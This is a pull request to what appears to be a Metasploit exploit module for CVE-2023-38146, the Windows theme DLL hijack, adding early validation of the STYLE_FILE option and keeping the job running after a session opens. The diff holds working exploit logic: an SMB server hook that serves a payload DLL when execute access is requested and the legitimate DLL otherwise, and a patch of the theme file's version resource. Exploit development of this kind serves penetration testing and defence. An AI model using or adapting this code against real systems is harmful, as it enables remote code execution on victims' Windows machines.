### PR TITLE
Feat/mod/CVE 2023 38146

### DIFF
--- a/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb
+++ b/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb
@@ -142,11 +142,6 @@ class MetasploitModule < Msf::Exploit::Remote
     THEME
   end
 
-  def on_new_session(session)
-    @service.stop
-    super
-  end
-
   class ThreadLocalVirtualStaticFile < RubySMB::Server::Share::Provider::VirtualDisk::VirtualStaticFile
     def initialize(*args, **kwargs)
       super

--- a/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb
+++ b/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb
@@ -72,22 +72,33 @@ class MetasploitModule < Msf::Exploit::Remote
   def setup
     super
 
+    @file = File.binread(datastore['STYLE_FILE'])
+    begin
+      pe = Rex::PeParsey::Pe.new_from_string(@file)
+    rescue Rex::PeParsey::PeError => e
+      fail_with(Failure::BadConfig, "Failed to parse the STYLE_FILE: #{e}")
+    end
+
+    unless pe.resources && (rva = pe.resources['/PACKTHEM_VERSION/0/0']&.rva)
+      fail_with(Failure::BadConfig, 'The STYLE_FILE has no PACKTHEM_VERSION resource.')
+    end
+    @file_version_offset = pe.rva_to_file_offset(rva)
+
     @file_name = datastore['STYLE_FILE_NAME'].blank? ? Rex::Text.rand_text_alpha(rand(4..6)) : datastore['STYLE_FILE_NAME']
     @file_name << '.msstyles' unless @file_name.end_with?('.msstyles')
   end
 
   def primer
-    legit_dll = File.binread(datastore['STYLE_FILE'])
     payload_dll = generate_payload_dll
-    max_length = [payload_dll.length, legit_dll.length].max
+    max_length = [payload_dll.length, @file.length].max
     # make sure that the lengths are the same by padding the smaller to the length of the larger
-    legit_dll.ljust(max_length, "\x00".b)
+    @file.ljust(max_length, "\x00".b)
     payload_dll.ljust(max_length, "\x00".b)
 
     virtual_disk = service.shares[@share]
     @service = service
 
-    virtual_file = ThreadLocalVirtualStaticFile.new(virtual_disk, "/#{@file_name}_vrf.dll", legit_dll)
+    virtual_file = ThreadLocalVirtualStaticFile.new(virtual_disk, "/#{@file_name}_vrf.dll", @file)
     virtual_disk.add(virtual_file)
     # install this hook for create requests to set the thread-local file content
     virtual_disk.add_hook(RubySMB::SMB2::Packet::CreateRequest) do |_session, request|
@@ -96,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if request.desired_access.execute == 1
         virtual_file.tl_content = payload_dll
       else
-        virtual_file.tl_content = legit_dll
+        virtual_file.tl_content = @file
       end
 
       nil
@@ -107,10 +118,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def get_file_contents(client:)
     print_status("Sending file to #{client.peerhost}")
-    pe_raw = File.binread(datastore['STYLE_FILE'])
-    pe = Rex::PeParsey::Pe.new_from_string(pe_raw)
-    version_offset = pe.rva_to_file_offset(pe.resources['/PACKTHEM_VERSION/0/0'].rva)
-    pe_raw[0...version_offset] + [999].pack('v') + pe_raw[(version_offset + 2)...]
+    new_version = [999].pack('v')
+    @file[0...@file_version_offset] + new_version + @file[(@file_version_offset + new_version.length)...]
   end
 
   def make_theme


### PR DESCRIPTION
This adds some error checking to the `#setup` method which will cause problems with the `STYLE_FILE` to be identified much earlier in the exploitation process. This should helpfully prevent instances where the user sets the `STYLE_FILE` option incorrectly and then does something with the defunct theme file.

It also keeps the job running after a session is opened since this is a file format exploit and IIRC, that's what most of them do.